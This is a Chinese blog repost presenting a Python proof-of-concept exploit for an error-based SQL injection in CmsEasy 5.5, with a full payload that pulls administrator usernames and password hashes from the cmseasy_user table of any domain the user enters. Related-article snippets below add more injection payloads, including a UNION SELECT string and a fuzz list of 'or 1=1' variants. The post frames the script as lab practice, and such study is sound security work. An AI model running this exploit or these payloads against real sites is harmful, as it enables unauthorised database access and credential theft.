一个简单sql注入的poc

最新推荐文章于 2025-04-17 17:23:38 发布
最新推荐文章于 2025-04-17 17:23:38 发布
阅读量627 收藏 2
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 python php
原文链接:http://www.cnblogs.com/cui0x01/p/6170115.html
本文介绍了一款使用Python编写的简单工具,用于验证CmsEasy5.5版本中存在的账号密码泄露漏洞。该脚本利用urllib和re模块发起POST请求并解析响应,最终获取并展示潜在的用户名和密码。

最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。

功能:验证CmsEasy5.5爆账号密码

实验用源码:http://pan.baidu.com/s/1i4lAwBF

搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。

通过浏览器访问确认存在漏洞存在。

 

用python来实现。

import urllib.request
import urllib.parse
import re
domain = input('请输入域名或ip(example:www.xx.com/xxx.xxx.xx):')
url = 'http://%s/cmseasy/celive/live/header.php' %(domain)
data = {
        'xajax':"LiveMessage",
        'xajaxargs[0][name]':"1',(SELECT 1 FROM "
        "(select count(*),concat(floor(rand(0)*2),"
        "(select concat(username,0x23,password,md5(123)) "
        "from cmseasy_user where groupid=2 limit 1))a "
        "from information_schema.tables group by a)b),"
        "'','','','1','127.0.0.1','2')#"
        }

data = urllib.parse.urlencode(data).encode('utf-8')    #将要post的数据进行编码
try:
        req = urllib.request.Request(url,data)    #get请求不需要写data参数,post需要把data参数写上
        response = urllib.request.urlopen(req)
        html = response.read().decode('utf-8')    
        if re.findall(r'a801fc3202cb962ac59075b964b07152',html):
                print("%s is vulnerable"%(url))
        html2 = re.findall(r'(?<=entry \'1).*(?=a801fc3202cb962ac59075b964b07152)',html)  #通过正则将账号密码匹配出来
        print(html2)
except Exception as err:
        print('Not Found')

转载于:https://www.cnblogs.com/cui0x01/p/6170115.html

37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 285
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
37-5 基于时间的盲注 SQL 注入 PoCPython 编写
weixin_43263566的博客
04-24 326
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
SRM智联云采系统receiptDetail SQL注入漏洞复现及POC
mashiro_hibiki的博客
11-25 232
【代码】SRM智联云采系统receiptDetail SQL注入漏洞复现及POC
SQL注入poc
最新发布
2202_75353840的博客
04-17 220
 这个是zabbix的漏洞,利用的是zabbix的js-rpc获取用户信息
sql注入pythonpoc_SQL注入POC
weixin_39702714的博客
12-17 307
#encoding=utf-8importhttplibimportrequestsimporttimeimportstringimportsyspayloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % ...
瑞友天翼2024SQL注入漏洞poc
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
用友NC-Cloud process SQL注入漏洞复现及POC
mashiro_hibiki的博客
11-29 434
【代码】用友NC-Cloud process SQL注入漏洞复现及POC
【漏洞复现】WookTeam searchinfo SQL注入漏洞 POC
qq_48368964的博客
08-20 9070
where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cmd5%28123456%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23`: 这是请求的URL,包含了一个查询参数`where[username]`,其值为一个SQL注入攻击的尝试。这个值试图执行一个UNION查询,将原始查询的结果与另一个查询的结果合并,从而获取更多的信息。需要注意的是,这个请求中包含了一个SQL注入攻击的尝试,这是一种常见的安全漏洞。
SQL注入PoC脚本教程与实践:全面解读sqli-labs
标题中的“sqli-labs PoC 脚本.rar”指的是一个压缩包文件,包含了用于学习和演示SQL注入技术的Proof of Concept(概念验证)脚本。SQL注入是一种安全漏洞,允许攻击者通过向Web应用的数据库查询中插入恶意SQL语句来...
sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_35517006的博客
02-11 231
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument(‘-u‘,dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
SQL注入POC
weixin_30731305的博客
03-03 549
mysql #encoding=utf-8importhttplibimporttimeimportstringimportsysimportrandomimporturllibheaders={'User-Agent':'Mozilla/5.0(Linux;U;Android2.3.6;en-us;NexusSBuild/GRK39F)Apple...
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 197
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_33910434的博客
12-18 339
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequests importargparse parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.ur...
sql注入漏洞poc代码fuzz代码
yyyyxzj的博客
08-22 647
"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"
sql注入
linyuezhouzhou的博客
07-08 573
湖南省网安基地
sql注入pythonpoc_基于python编写PoC
weixin_39746241的博客
12-17 442
0x02 SQL Injection poc编写已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细(由于wooyun已经暂停访问,故不上链接了)。·首先,我们需要下载其相关源码,进行本地搭建。·阅读漏洞细节,我们得知其url与payload如下:URL:http://xxx.xxx/celive/live/header.phpPayload:xajax=Live...
poc练习-dvwa靶场sql注入(盲注)
qq_44248518的博客
02-24 403
dvwasql注入pocPython
Python从0到POC编写--SQL注入
余十步的博客
05-08 1749
SQL注入POC编写。
渗透测试之POC基于报错的sql注入
黑面狐
01-03 5852
sql注入一般是主要有三种,基于报错注入,基于布尔的盲注和基于时间的盲注。 原理我不多说了,今天开始写sql注入poc。 首先POC的漏洞存在的证明,而sql注入poc我们只要证明sql语句被执行了即可。 首先看我们的测试环境。 测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入 此时用union来确定有多少
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值